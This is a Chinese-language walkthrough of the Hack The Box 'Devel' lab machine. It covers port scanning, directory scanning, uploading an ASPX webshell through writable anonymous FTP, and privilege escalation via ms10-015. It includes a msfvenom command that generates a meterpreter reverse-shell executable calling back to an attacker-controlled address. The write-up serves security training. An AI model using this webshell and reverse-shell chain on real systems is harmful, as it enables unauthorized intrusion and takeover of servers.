Hack The Box —— Devel
信息搜集
nmap
nmap -T4 -A -v 10.10.10.5
发现服务器开了 21
端口和 80
端口,同时 ftp
服务可以匿名访问,但是不知道版本号。浏览器访问 http
服务,发现 只有 iis
的默认页面。
目录扫描
利用 dirsearch
工具扫描一波目录:
python3 dirsearch -u http://10.10.10.5 -e html
并未有什么特殊的发现。
FTP
匿名访问 FTP
服务,发现当前目录下有写权限,所以,想通过上传 webshell
的方式获取服务器的权限。
漏洞利用
webshell
首先上传 aspx
的 webshell:
浏览器访问,发现 webshell 未报错,可以执行。
用蚁剑链接:
访问一些目录,发现权限不足。
利用蚁剑的 虚拟终端
,执行 whoami
,发现只有 iis user
的权限,遂想办法提权。
权限提升
利用 msfvenom
生成 exe 木马文件,使用 msf 接收到回连的 shell,方便提权。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.10 LPORT=4444 -f exe > shell.exe
然后将生成的 shell.exe
文件通过蚁剑上传到目标服务器上,并通过虚拟终端执行。
使用 msf 监听端口,接收回连的 shell :
使用 msf 自带的检测脚本,查看可能用于提权的漏洞:
经过一个一个的测试:发现 ms10-015 可以用来提权。
成功创建了一个新的 session.
在 meterpreter 下执行 getuid 命令:
发现成功提权。
接下来就可以 type c:\users\Administrator\Desktop\root.txt.txt
获取 flag
了。
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论